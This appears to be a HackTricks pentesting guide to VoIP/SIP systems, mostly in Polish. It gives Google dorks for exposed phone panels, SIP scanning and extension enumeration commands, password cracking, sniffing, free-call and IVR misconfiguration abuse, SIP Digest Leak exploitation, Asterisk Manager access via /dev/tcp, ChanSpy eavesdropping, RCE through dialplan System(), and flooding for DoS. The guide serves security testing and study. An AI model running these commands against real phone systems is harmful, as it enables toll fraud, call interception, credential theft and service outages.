Pentesting VoIP

Uzyskaj perspektywę hakera na swoje aplikacje webowe, sieć i chmurę

Znajdź i zgłoś krytyczne, podatne na ataki luki z rzeczywistym wpływem na biznes. Użyj naszych 20+ niestandardowych narzędzi, aby zmapować powierzchnię ataku, znaleźć problemy z bezpieczeństwem, które pozwalają na eskalację uprawnień, oraz użyj automatycznych exploitów do zbierania niezbędnych dowodów, przekształcając swoją ciężką pracę w przekonujące raporty.

Penetration testing toolkit, ready to usePentest-Tools.com

Podstawowe informacje o VoIP

Aby zacząć uczyć się, jak działa VoIP, sprawdź:

Podstawowe wiadomości

Request name	Description								RFC references
------------------------------------------------------------------------------------------------------
REGISTER	Register a SIP user.							RFC 3261
INVITE		Initiate a dialog for establishing a call. 				RFC 3261
ACK		Confirm that an entity has received.					RFC 3261
BYE		Signal termination of a dialog and end a call.				RFC 3261
CANCEL		Cancel any pending request.						RFC 3261
UPDATE		Modify the state of a session without changing the state of the dialog.	RFC 3311
REFER		Ask recipient to issue a request for the purpose of call transfer.	RFC 3515
PRACK		Provisional acknowledgement.						RFC 3262
SUBSCRIBE	Initiates a subscription for notification of events from a notifier.	RFC 6665
NOTIFY		Inform a subscriber of notifications of a new event.			RFC 6665
PUBLISH		Publish an event to a notification server.				RFC 3903
MESSAGE		Deliver a text message.	Used in instant messaging applications.		RFC 3428
INFO		Send mid-session information that does not modify the session state.	RFC 6086
OPTIONS		Query the capabilities of an endpoint					RFC 3261

Kody Odpowiedzi

1xx—Odpowiedzi Provisional

100 Trying
180 Ringing
181 Call is Being Forwarded
182 Queued
183 Session Progress
199 Early Dialog Terminated

2xx—Odpowiedzi z sukcesem

200 OK
202 Accepted
204 No Notification

3xx—Odpowiedzi przekierowujące

300 Multiple Choices
301 Moved Permanently
302 Moved Temporarily
305 Use Proxy
380 Alternative Service

4xx—Odpowiedzi o błędach klienta

400 Bad Request
401 Unauthorized
402 Payment Required
403 Forbidden
404 Not Found
405 Method Not Allowed
406 Not Acceptable
407 Proxy Authentication Required
408 Request Timeout
409 Conflict
410 Gone
411 Length Required
412 Conditional Request Failed
413 Request Entity Too Large
414 Request-URI Too Long
415 Unsupported Media Type
416 Unsupported URI Scheme
417 Unknown Resource-Priority
420 Bad Extension
421 Extension Required
422 Session Interval Too Small
423 Interval Too Brief
424 Bad Location Information
425 Bad Alert Message
428 Use Identity Header
429 Provide Referrer Identity
430 Flow Failed
433 Anonymity Disallowed
436 Bad Identity-Info
437 Unsupported Certificate
438 Invalid Identity Header
439 First Hop Lacks Outbound Support
440 Max-Breadth Exceeded
469 Bad Info Package
470 Consent Needed
480 Temporarily Unavailable
481 Call/Transaction Does Not Exist
482 Loop Detected
483 Too Many Hops
484 Address Incomplete
485 Ambiguous
486 Busy Here
487 Request Terminated
488 Not Acceptable Here
489 Bad Event
491 Request Pending
493 Undecipherable
494 Security Agreement Required

5xx—Odpowiedzi o błędach serwera

500 Internal Server Error
501 Not Implemented
502 Bad Gateway
503 Service Unavailable
504 Server Time-out
505 Version Not Supported
513 Message Too Large
555 Push Notification Service Not Supported
580 Precondition Failure

6xx—Global Failure Responses

600 Busy Everywhere
603 Decline
604 Does Not Exist Anywhere
606 Not Acceptable
607 Unwanted
608 Rejected

VoIP Enumeration

Numery Telefonów

Jednym z pierwszych kroków, które może podjąć Red Team, jest wyszukiwanie dostępnych numerów telefonów do kontaktu z firmą za pomocą narzędzi OSINT, wyszukiwania w Google lub skanowania stron internetowych.

Gdy masz numery telefonów, możesz skorzystać z usług online, aby zidentyfikować operatora:

• https://www.numberingplans.com/?page=analysis&sub=phonenr

• https://mobilenumbertracker.com/

• https://www.whitepages.com/

• https://www.twilio.com/lookup

Znając operatora, który świadczy usługi VoIP, możesz zidentyfikować, czy firma korzysta z VoIP... Co więcej, możliwe jest, że firma nie zatrudniła usług VoIP, ale używa kart PSTN do połączenia własnej centrali VoIP z tradycyjną siecią telefoniczną.

Rzeczy takie jak automatyczne odpowiedzi z muzyką zazwyczaj wskazują, że używane jest VoIP.

Google Dorks

# Grandstream phones
intitle:"Grandstream Device Configuration" Password
intitle:"Grandstream Device Configuration" (intext:password & intext:"Grandstream Device Configuration" & intext:"Grandstream Networks" | inurl:cgi-bin) -.com|org

# Cisco Callmanager
inurl:"ccmuser/logon.asp"
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button"

# Cisco phones
inurl:"NetworkConfiguration" cisco

# Linksys phones
intitle:"Sipura SPA Configuration"

# Snom phones
intitle:"snom" intext:"Welcome to Your Phone!" inurl:line_login.htm

# Polycom SoundPoint IP & phones
intitle:"SoundPoint IP Configuration Utility - Registration"
"Welcome to Polycom Web Configuration Utility" "Login as" "Password"
intext: "Welcome to Polycom Web Configuration Utility" intitle:"Polycom - Configuration Utility" inurl:"coreConf.htm"
intitle:"Polycom Login" inurl:"/login.html"
intitle:"Polycom Login" -.com

# Elastix
intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL"

# FreePBX
inurl:"maint/index.php?FreePBX" intitle: "FreePBX" intext:"FreePBX Admministration"

OSINT information

Każda inna enumeracja OSINT, która pomoże zidentyfikować używane oprogramowanie VoIP, będzie pomocna dla Red Team.

Network Enumeration

• nmap jest w stanie skanować usługi UDP, ale z powodu liczby skanowanych usług UDP, jest bardzo wolny i może nie być zbyt dokładny w przypadku tego rodzaju usług.

sudo nmap --script=sip-methods -sU -p 5060 10.10.0.0/24

• svmap z SIPVicious (sudo apt install sipvicious): Zlokalizuje usługi SIP w wskazanej sieci.

• svmap jest łatwy do zablokowania, ponieważ używa User-Agent friendly-scanner, ale możesz zmodyfikować kod z /usr/share/sipvicious/sipvicious i go zmienić.

# Use --fp to fingerprint the services
svmap 10.10.0.0/24 -p 5060-5070 [--fp]

• SIPPTS scan from sippts: Skanowanie SIPPTS to bardzo szybki skaner dla usług SIP przez UDP, TCP lub TLS. Używa wielowątkowości i może skanować duże zakresy sieci. Umożliwia łatwe wskazanie zakresu portów, skanowanie zarówno TCP, jak i UDP, użycie innej metody (domyślnie użyje OPTIONS) oraz określenie innego User-Agent (i więcej).

sippts scan -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]

[!] IP/Network: 10.10.0.0/24
[!] Port range: 5060-5080
[!] Protocol: UDP, TCP, TLS
[!] Method to scan: REGISTER
[!] Customized User-Agent: Cisco
[!] Used threads: 200

• metasploit:

auxiliary/scanner/sip/options_tcp normal  No     SIP Endpoint Scanner (TCP)
auxiliary/scanner/sip/options     normal  No     SIP Endpoint Scanner (UDP)

Dodatkowe enumerowanie sieci

PBX może również udostępniać inne usługi sieciowe, takie jak:

• 69/UDP (TFTP): Aktualizacje oprogramowania

• 80 (HTTP) / 443 (HTTPS): Zarządzanie urządzeniem z poziomu sieci

• 389 (LDAP): Alternatywa do przechowywania informacji o użytkownikach

• 3306 (MySQL): Baza danych MySQL

• 5038 (Manager): Umożliwia korzystanie z Asteriska z innych platform

• 5222 (XMPP): Wiadomości za pomocą Jabber

• 5432 (PostgreSQL): Baza danych PostgreSQL

• I inne...

Enumerowanie metod

Możliwe jest znalezienie które metody są dostępne do użycia w PBX za pomocą SIPPTS enumerate z sippts

sippts enumerate -i 10.10.0.10

Analizowanie odpowiedzi serwera

Bardzo ważne jest, aby analizować nagłówki, które serwer wysyła z powrotem do nas, w zależności od rodzaju wiadomości i nagłówków, które wysyłamy. Za pomocą SIPPTS send z sippts możemy wysyłać spersonalizowane wiadomości, manipulując wszystkimi nagłówkami, i analizować odpowiedź.

sippts send -i 10.10.0.10 -m INVITE -ua Grandstream -fu 200 -fn Bob -fd 11.0.0.1 -tu 201 -fn Alice -td 11.0.0.2 -header "Allow-Events: presence" -sdp

Możliwe jest również uzyskanie danych, jeśli serwer używa websockets. Z SIPPTS wssend z sippts możemy wysyłać spersonalizowane wiadomości WS.

sippts wssend -i 10.10.0.10 -r 443 -path /ws

Extension Enumeration

Rozszerzenia w systemie PBX (Prywatna Centrala Telefoniczna) odnoszą się do unikalnych identyfikatorów wewnętrznych przypisanych do poszczególnych linii telefonicznych, urządzeń lub użytkowników w organizacji lub firmie. Rozszerzenia umożliwiają efektywne kierowanie połączeń wewnątrz organizacji, bez potrzeby posiadania indywidualnych zewnętrznych numerów telefonów dla każdego użytkownika lub urządzenia.

• svwar z SIPVicious (sudo apt install sipvicious): svwar to darmowy skaner linii rozszerzeń SIP PBX. W koncepcji działa podobnie do tradycyjnych wardialerów, zgadując zakres rozszerzeń lub podaną listę rozszerzeń.

svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER

• SIPPTS exten z sippts: SIPPTS exten identyfikuje rozszerzenia na serwerze SIP. Sipexten może sprawdzać duże zakresy sieci i portów.

sippts exten -i 10.10.0.10 -r 5060 -e 100-200

• metasploit: Możesz również enumerować rozszerzenia/nazwy użytkowników za pomocą metasploit:

auxiliary/scanner/sip/enumerator_tcp  normal  No     SIP Username Enumerator (TCP)
auxiliary/scanner/sip/enumerator      normal  No     SIP Username Enumerator (UDP)

• enumiax (apt install enumiax): enumIAX to enumerator brute-force nazw użytkowników protokołu Inter Asterisk Exchange. enumIAX może działać w dwóch odrębnych trybach: sekwencyjnego zgadywania nazw użytkowników lub ataku słownikowego.

enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 10.10.0.10 # Use dictionary
enumiax -v -m3 -M3 10.10.0.10

Ataki VoIP

Atak Brute-Force na hasło - online

Po odkryciu PBX i niektórych rozszerzeń/nazw użytkowników, Zespół Czerwony może spróbować uwierzytelnić się za pomocą metody REGISTER do rozszerzenia, używając słownika powszechnych haseł do przeprowadzenia ataku brute force na uwierzytelnienie.

• svcrack z SIPVicious (sudo apt install sipvicious): SVCrack pozwala na złamanie hasła dla konkretnej nazwy użytkownika/rozszerzenia na PBX.

svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 #Crack known username
svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions

• SIPPTS rcrack z sippts: SIPPTS rcrack to zdalny program do łamania haseł dla usług SIP. Rcrack może testować hasła dla kilku użytkowników w różnych zakresach IP i portów.

sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt

• Metasploit:

• https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb

• https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack_tcp.rb

VoIP Sniffing

Jeśli znajdziesz sprzęt VoIP w otwartej sieci Wifi, możesz przechwycić wszystkie informacje. Co więcej, jeśli jesteś w bardziej zamkniętej sieci (połączonej przez Ethernet lub chronioną Wifi), możesz przeprowadzić ataki MitM, takie jak ARPspoofing między PBX a bramą, aby przechwycić informacje.

Wśród informacji sieciowych możesz znaleźć dane logowania do zarządzania sprzętem, numery wewnętrzne użytkowników, nazwy użytkowników, adresy IP, a nawet zhardcodowane hasła i pakiety RTP, które możesz odtworzyć, aby usłyszeć rozmowę, i więcej.

Aby uzyskać te informacje, możesz użyć narzędzi takich jak Wireshark, tcpdump... ale specjalnie stworzone narzędzie do przechwytywania rozmów VoIP to ucsniff.

SIP credentials (Password Brute-Force - offline)

Sprawdź ten przykład, aby lepiej zrozumieć komunikację SIP REGISTER, aby dowiedzieć się, jak są wysyłane dane logowania.

• sipdump i sipcrack, część sipcrack (apt-get install sipcrack): Te narzędzia mogą wyodrębnić z pcap uwierzytelnienia digest w protokole SIP i przeprowadzić atak brute-force na nie.

sipdump -p net-capture.pcap sip-creds.txt
sipcrack sip-creds.txt -w dict.txt

• SIPPTS dump z sippts: SIPPTS dump może wyodrębnić uwierzytelnienia digest z pliku pcap.

sippts dump -f capture.pcap -o data.txt

• SIPPTS dcrack z sippts: SIPPTS dcrack to narzędzie do łamania uwierzytelnień digestowych uzyskanych za pomocą zrzutu SIPPTS.

sippts dcrack -f data.txt -w wordlist/rockyou.txt

• SIPPTS tshark z sippts: SIPPTS tshark wyodrębnia dane protokołu SIP z pliku PCAP.

sippts tshark -f capture.pcap [-filter auth]

Kody DTMF

Nie tylko dane uwierzytelniające SIP można znaleźć w ruchu sieciowym, możliwe jest również znalezienie kodów DTMF, które są używane na przykład do uzyskania dostępu do poczty głosowej. Można wysyłać te kody w wiadomościach INFO SIP, w audio lub wewnątrz pakietów RTP. Jeśli kody znajdują się w pakietach RTP, można wyciąć tę część rozmowy i użyć narzędzia multimo do ich ekstrakcji:

multimon -a DTMF -t wac pin.wav

Free Calls / Asterisks Connections Misconfigurations

W Asterisku możliwe jest zezwolenie na połączenie z konkretnego adresu IP lub z dowolnego adresu IP:

host=10.10.10.10
host=dynamic

Jeśli adres IP jest określony, host nie będzie musiał wysyłać żądań REGISTER co jakiś czas (w pakiecie REGISTER wysyłany jest czas życia, zazwyczaj 30 minut, co oznacza, że w innym scenariuszu telefon będzie musiał REJESTROWAĆ się co 30 minut). Jednakże, będzie musiał mieć otwarte porty umożliwiające połączenia z serwerem VoIP w celu odbierania połączeń.

Aby zdefiniować użytkowników, można ich zdefiniować jako:

• type=user: Użytkownik może odbierać połączenia tylko jako użytkownik.

• type=friend: Możliwe jest wykonywanie połączeń jako peer i odbieranie ich jako użytkownik (używane z rozszerzeniami)

• type=peer: Możliwe jest wysyłanie i odbieranie połączeń jako peer (SIP-trunki)

Możliwe jest również nawiązanie zaufania za pomocą zmiennej insecure:

• insecure=port: Umożliwia połączenia peer weryfikowane przez IP.

• insecure=invite: Nie wymaga uwierzytelnienia dla wiadomości INVITE

• insecure=port,invite: Oba

Darmowe Połączenia / Błędne Konfiguracje Kontekstów Asteriska

W Asterisku kontekst to nazwany kontener lub sekcja w planie numeracyjnym, która grupuje powiązane rozszerzenia, akcje i zasady. Plan numeracyjny jest kluczowym komponentem systemu Asterisk, ponieważ definiuje jak obsługiwane i kierowane są połączenia przychodzące i wychodzące. Konteksty są używane do organizacji planu numeracyjnego, zarządzania kontrolą dostępu i zapewnienia separacji między różnymi częściami systemu.

Każdy kontekst jest definiowany w pliku konfiguracyjnym, zazwyczaj w pliku extensions.conf. Konteksty są oznaczane nawiasami kwadratowymi, a nazwa kontekstu jest umieszczona w ich wnętrzu. Na przykład:

csharpCopy code[my_context]

W kontekście definiujesz numery wewnętrzne (wzorce wybieranych numerów) i łączysz je z serią działań lub aplikacji. Te działania określają, jak połączenie jest przetwarzane. Na przykład:

[my_context]
exten => 100,1,Answer()
exten => 100,n,Playback(welcome)
exten => 100,n,Hangup()

Ten przykład demonstruje prosty kontekst o nazwie "my_context" z rozszerzeniem "100". Gdy ktoś wybierze 100, połączenie zostanie odebrane, zostanie odtworzona wiadomość powitalna, a następnie połączenie zostanie zakończone.

To jest inny kontekst, który pozwala na wywołanie dowolnego innego numeru:

[external]
exten => _X.,1,Dial(SIP/trunk/${EXTEN})

Jeśli administrator definiuje domyślny kontekst jako:

[default]
include => my_context
include => external

• SIPPTS invite z sippts: SIPPTS invite sprawdza, czy serwer PBX pozwala nam na wykonywanie połączeń bez autoryzacji. Jeśli serwer SIP ma nieprawidłową konfigurację, pozwoli nam na wykonywanie połączeń do numerów zewnętrznych. Może również pozwolić nam na przekazanie połączenia do drugiego numeru zewnętrznego.

Na przykład, jeśli twój serwer Asterisk ma złą konfigurację kontekstu, możesz zaakceptować żądanie INVITE bez autoryzacji. W takim przypadku atakujący może wykonywać połączenia, nie znając żadnego użytkownika/hasła.

# Trying to make a call to the number 555555555 (without auth) with source number 200.
sippts invite -i  10.10.0.10 -fu 200 -tu 555555555 -v

# Trying to make a call to the number 555555555 (without auth) and transfer it to number 444444444.
sippts invite -i 10.10.0.10 -tu 555555555 -t 444444444

Darmowe połączenia / Źle skonfigurowane IVRS

IVRS oznacza System Interaktywnej Odpowiedzi Głosowej, technologię telekomunikacyjną, która pozwala użytkownikom na interakcję z systemem komputerowym za pomocą głosu lub tonów dotykowych. IVRS jest używane do budowy systemów automatycznego obsługi połączeń, które oferują szereg funkcji, takich jak dostarczanie informacji, kierowanie połączeń i zbieranie danych od użytkowników.

IVRS w systemach VoIP zazwyczaj składa się z:

1. Podpowiedzi głosowe: Wstępnie nagrane wiadomości audio, które prowadzą użytkowników przez opcje menu IVR i instrukcje.

2. DTMF (Dual-Tone Multi-Frequency) sygnalizacja: Tones dotykowe generowane przez naciśnięcie klawiszy na telefonie, które są używane do nawigacji po menu IVR i dostarczania danych.

3. Kierowanie połączeń: Kierowanie połączeń do odpowiedniego celu, takiego jak konkretne działy, agenci lub numery wewnętrzne na podstawie danych od użytkownika.

4. Zbieranie danych od użytkowników: Zbieranie informacji od dzwoniących, takich jak numery kont, identyfikatory spraw lub inne istotne dane.

5. Integracja z systemami zewnętrznymi: Łączenie systemu IVR z bazami danych lub innymi systemami oprogramowania w celu uzyskania lub aktualizacji informacji, wykonywania działań lub wyzwalania zdarzeń.

W systemie VoIP Asterisk możesz stworzyć IVR używając planu wybierania (extensions.conf plik) oraz różnych aplikacji, takich jak Background(), Playback(), Read() i innych. Te aplikacje pomagają odtwarzać podpowiedzi głosowe, zbierać dane od użytkowników i kontrolować przepływ połączeń.

Przykład podatnej konfiguracji

exten => 0,100,Read(numbers,the_call,,,,5)
exten => 0,101,GotoIf("$[${numbers}"="1"]?200)
exten => 0,102,GotoIf("$[${numbers}"="2"]?300)
exten => 0,103,GotoIf("$[${numbers}"=""]?100)
exten => 0,104,Dial(LOCAL/${numbers})

Poprzedni to przykład, w którym użytkownik jest proszony o naciśnięcie 1, aby zadzwonić do działu, 2, aby zadzwonić do innego, lub pełnego numeru wewnętrznego, jeśli go zna. Wrażliwość polega na tym, że wskazana długość numeru wewnętrznego nie jest sprawdzana, więc użytkownik może wprowadzić 5-sekundowy limit jako pełny numer, a on zostanie wywołany.

Wstrzykiwanie numeru wewnętrznego

Używając numeru wewnętrznego takiego jak:

exten => _X.,1,Dial(SIP/${EXTEN})

Gdzie ${EXTEN} to numer wewnętrzny, który będzie wywoływany, gdy wprowadzony zostanie ext 101, to co się stanie:

exten => 101,1,Dial(SIP/101)

Jednakże, jeśli ${EXTEN} pozwala na wprowadzenie więcej niż cyfr (jak w starszych wersjach Asterisk), atakujący mógłby wprowadzić 101&SIP123123123, aby zadzwonić pod numer telefonu 123123123. I to byłby wynik:

exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123)

Dlatego połączenie do rozszerzenia 101 i 123123123 zostanie wysłane, a tylko pierwsze z nich nawiąże połączenie... ale jeśli atakujący użyje rozszerzenia, które omija jakiekolwiek dopasowanie, które jest wykonywane, ale nie istnieje, mógłby wstrzyknąć połączenie tylko do pożądanego numeru.

Wrażliwość SIPDigestLeak

Wrażliwość SIP Digest Leak dotyczy dużej liczby telefonów SIP, w tym zarówno sprzętowych, jak i programowych telefonów IP oraz adapterów telefonicznych (VoIP na analogowe). Wrażliwość ta pozwala na wyciek odpowiedzi na uwierzytelnienie Digest, która jest obliczana na podstawie hasła. Możliwy jest atak offline na hasło, który może odzyskać większość haseł na podstawie odpowiedzi na wyzwanie.

**Scenariusz wrażliwości stąd**:

1. Telefon IP (ofiara) nasłuchuje na dowolnym porcie (na przykład: 5060), akceptując połączenia telefoniczne

2. Atakujący wysyła INVITE do telefonu IP

3. Telefon ofiary zaczyna dzwonić, a ktoś odbiera i odkłada słuchawkę (ponieważ nikt nie odpowiada na telefon po drugiej stronie)

4. Gdy telefon zostaje odłożony, telefon ofiary wysyła BYE do atakującego

5. Atakujący wydaje odpowiedź 407, która prosi o uwierzytelnienie i wydaje wyzwanie uwierzytelniające

6. Telefon ofiary dostarcza odpowiedź na wyzwanie uwierzytelniające w drugim BYE

7. Atakujący może następnie przeprowadzić atak brute-force na odpowiedzi na wyzwanie na swoim lokalnym komputerze (lub w rozproszonej sieci itp.) i odgadnąć hasło

• Wyciek SIPPTS z sippts: Wyciek SIPPTS wykorzystuje wrażliwość SIP Digest Leak, która dotyczy dużej liczby telefonów SIP. Wynik można zapisać w formacie SipCrack, aby przeprowadzić atak brute-force za pomocą SIPPTS dcrack lub narzędzia SipCrack.

sippts leak -i 10.10.0.10

[!] Target: 10.10.0.10:5060/UDP
[!] Caller: 100
[!] Callee: 100

[=>] Request INVITE
[<=] Response 100 Trying
[<=] Response 180 Ringing
[<=] Response 200 OK
[=>] Request ACK
... waiting for BYE ...
[<=] Received BYE
[=>] Request 407 Proxy Authentication Required
[<=] Received BYE with digest
[=>] Request 200 Ok

Auth=Digest username="pepelux", realm="asterisk", nonce="lcwnqoz0", uri="sip:100@10.10.0.10:56583;transport=UDP", response="31fece0d4ff6fd524c1d4c9482e99bb2", algorithm=MD5

Click2Call

Click2Call pozwala użytkownikowi sieciowemu (który na przykład może być zainteresowany produktem) na wprowadzenie swojego numeru telefonu, aby otrzymać połączenie. Następnie zostanie wykonane połączenie do agenta, a gdy odbierze telefon, użytkownik zostanie połączony z agentem.

Typowy profil Asterisk dla tego to:

[web_user]
secret = complex_password
deny = 0.0.0.0/0.0.0.0
allow = 0.0.0.0/0.0.0.0
displayconnects = yes
read = system,call,log,verbose,agent,user,config,dtmf,reporting,crd,diapla
write = system,call,agent,user,config,command,reporting,originate

• Poprzedni profil pozwala na połączenie z DOWOLNYM adresem IP (jeśli hasło jest znane).

• Aby zorganizować połączenie, jak wcześniej określono, nie są potrzebne uprawnienia do odczytu i tylko originate w zapisie jest wymagane.

Dzięki tym uprawnieniom każdy adres IP znający hasło mógłby się połączyć i wydobyć zbyt wiele informacji, takich jak:

# Get all the peers
exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecret:password\nEvents: off\n\nAction:Command\nCommand: sip show peers\n\nAction: logoff\n\n">&3 && cat <&3

Można zażądać więcej informacji lub działań.

Podsłuchiwanie

W Asterisku możliwe jest użycie polecenia ChanSpy, wskazując numer(y) wewnętrzny(e) do monitorowania (lub wszystkie) w celu usłyszenia rozmów, które się odbywają. To polecenie musi być przypisane do numeru wewnętrznego.

Na przykład, exten => 333,1,ChanSpy('all',qb) wskazuje, że jeśli zadzwonisz na numer wewnętrzny 333, będzie monitorować wszystkie numery wewnętrzne, rozpoczynając nasłuchiwanie za każdym razem, gdy rozpocznie się nowa rozmowa (b) w trybie cichym (q), ponieważ nie chcemy wchodzić w interakcję. Możesz przechodzić z jednej rozmowy do drugiej, naciskając *, lub wybierając numer wewnętrzny.

Możliwe jest również użycie ExtenSpy do monitorowania tylko jednego numeru wewnętrznego.

Zamiast słuchać rozmów, możliwe jest nagrywanie ich w plikach przy użyciu numeru wewnętrznego, takiego jak:

[recorded-context]
exten => _X.,1,Set(NAME=/tmp/${CONTEXT}_${EXTEN}_${CALLERID(num)}_${UNIQUEID}.wav)
exten => _X.,2,MixMonitor(${NAME})

Połączenia będą zapisywane w /tmp.

Możesz również sprawić, że Asterisk wykona skrypt, który ujawni połączenie po jego zakończeniu.

exten => h,1,System(/tmp/leak_conv.sh &)

Wrażliwość RTCPBleed

RTCPBleed to poważny problem bezpieczeństwa, który dotyczy serwerów VoIP opartych na Asterisku (opublikowany w 2017 roku). Wrażliwość ta pozwala na **przechwytywanie i przekierowywanie ruchu RTP (Real Time Protocol), który przenosi rozmowy VoIP, przez każdego w Internecie. Dzieje się tak, ponieważ ruch RTP omija uwierzytelnianie podczas przechodzenia przez zapory NAT (Network Address Translation).

Proxysy RTP próbują rozwiązać ograniczenia NAT, które wpływają na systemy RTC, poprzez proxyzowanie strumieni RTP między dwiema lub więcej stronami. Gdy NAT jest w użyciu, oprogramowanie proxy RTP często nie może polegać na informacjach o IP i porcie RTP uzyskanych przez sygnalizację (np. SIP). Dlatego wiele proxy RTP wdrożyło mechanizm, w którym taki tuplet IP i port jest uczony automatycznie. Często odbywa się to poprzez inspekcję przychodzącego ruchu RTP i oznaczanie adresu IP i portu źródłowego dla wszelkiego przychodzącego ruchu RTP jako tego, na który należy odpowiedzieć. Ten mechanizm, który może być nazywany "trybem uczenia się", nie wykorzystuje żadnego rodzaju uwierzytelniania. Dlatego atakujący mogą wysyłać ruch RTP do proxy RTP i otrzymywać proxowany ruch RTP przeznaczony dla dzwoniącego lub odbierającego w trwającym strumieniu RTP. Nazywamy tę wrażliwość RTP Bleed, ponieważ pozwala ona atakującym na odbieranie strumieni mediów RTP, które mają być wysyłane do legalnych użytkowników.

Innym interesującym zachowaniem proxy RTP i stosów RTP jest to, że czasami, nawet jeśli nie są podatne na RTP Bleed, będą akceptować, przekazywać i/lub przetwarzać pakiety RTP z dowolnego źródła. Dlatego atakujący mogą wysyłać pakiety RTP, co może pozwolić im na wstrzyknięcie swojego medium zamiast legalnego. Nazywamy ten atak wstrzyknięciem RTP, ponieważ pozwala on na wstrzyknięcie nielegalnych pakietów RTP do istniejących strumieni RTP. Ta wrażliwość może występować zarówno w proxy RTP, jak i w punktach końcowych.

Asterisk i FreePBX tradycyjnie używały ustawienia NAT=yes, które umożliwia ruchowi RTP omijanie uwierzytelniania, co potencjalnie prowadzi do braku dźwięku lub dźwięku jednokierunkowego w połączeniach.

Aby uzyskać więcej informacji, sprawdź https://www.rtpbleed.com/

• SIPPTS rtpbleed z sippts: SIPPTS rtpbleed wykrywa wrażliwość RTP Bleed, wysyłając strumienie RTP.

sippts rtpbleed -i 10.10.0.10

• SIPPTS rtcpbleed z sippts: SIPPTS rtcpbleed wykrywa podatność RTP Bleed, wysyłając strumienie RTCP.

sippts rtcpbleed -i 10.10.0.10

• SIPPTS rtpbleedflood z sippts: SIPPTS rtpbleedflood wykorzystuje lukę RTP Bleed, wysyłając strumienie RTP.

sippts rtpbleedflood -i 10.10.0.10 -p 10070 -v

• SIPPTS rtpbleedinject from sippts: SIPPTS rtpbleedinject wykorzystuje lukę RTP Bleed, wstrzykując plik audio (format WAV).

sippts rtpbleedinject -i 10.10.0.10 -p 10070 -f audio.wav

RCE

W Asterisku w jakiś sposób udaje ci się dodać reguły rozszerzeń i je przeładować (na przykład poprzez skompromitowanie podatnego serwera menedżera webowego), możliwe jest uzyskanie RCE za pomocą polecenia System.

same => n,System(echo "Called at $(date)" >> /tmp/call_log.txt)

There is command called Shell that could be used instead of System to execute system commands if necessary.

Interesujące lokalne pliki i uprawnienia

• sip.conf -> Zawiera hasło użytkowników SIP.

• Jeśli serwer Asterisk działa jako root, możesz skompromitować root.

• użytkownik root mysql może nie mieć żadnego hasła.

• to może być użyte do stworzenia nowego użytkownika mysql jako backdoor.

• FreePBX

• amportal.conf -> Zawiera hasło administratora panelu webowego (FreePBX).

• FreePBX.conf -> Zawiera hasło użytkownika FreePBXuser używanego do dostępu do bazy danych.

• to może być użyte do stworzenia nowego użytkownika mysql jako backdoor.

• Elastix

• Elastix.conf -> Zawiera kilka haseł w czystym tekście, takich jak hasło root mysql, hasło IMAPd, hasło administratora webowego.

• Kilka folderów będzie należało do skompromitowanego użytkownika asterisk (jeśli nie działa jako root). Użytkownik ten może czytać poprzednie pliki i kontrolować konfigurację, więc mógłby sprawić, że Asterisk załadowałby inne zainfekowane binaria podczas wykonywania.

RTP Injection

It's possible to insert a .wav in converstions using tools such as rtpinsertsound (sudo apt install rtpinsertsound) and rtpmixsound (sudo apt install rtpmixsound).

Or you could use the scripts from http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/ to scan conversations (rtpscan.pl), send a .wav to a conversation (rtpsend.pl) and insert noise in a conversation (rtpflood.pl).

DoS

There are several ways to try to achieve DoS in VoIP servers.

• SIPPTS flood from sippts**: SIPPTS flood sends unlimited messages to the target.

• sippts flood -i 10.10.0.10 -m invite -v

• SIPPTS ping from sippts**: SIPPTS ping makes a SIP ping to see the server response time.

• sippts ping -i 10.10.0.10

• IAXFlooder: DoS IAX protocol used by Asterisk.

• inviteflood: A tool to perform SIP/SDP INVITE message flooding over UDP/IP.

• rtpflood: Send several well formed RTP packets. Its needed to know the RTP ports that are being used (sniff first).

• SIPp: Allows to analyze and generate SIP traffic. so it can be used to DoS also.

• SIPsak: SIP swiss army knife. Can also be used to perform SIP attacks.

• Fuzzers: protos-sip, voiper.

OS Vulnerabilities

The easiest way to install a software such as Asterisk is to download an OS distribution that has it already installed, such as: FreePBX, Elastix, Trixbox... The problem with those is that once it's working sysadmins might not update them again and vulnerabilities are going to be discovered with time.

References

• https://github.com/Pepelux/sippts/wiki

• https://github.com/EnableSecurity/sipvicious

• http://blog.pepelux.org/

• https://www.rtpbleed.com/

• https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4

• https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf

Get a hacker's perspective on your web apps, network, and cloud

Find and report critical, exploitable vulnerabilities with real business impact. Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.

Penetration testing toolkit, ready to usePentest-Tools.com

Support HackTricks

• Check the subscription plans!

• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.

• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.